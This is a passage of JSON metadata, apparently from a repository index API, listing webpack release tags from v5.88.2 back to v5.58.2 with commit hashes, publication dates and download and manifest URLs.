pi/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"t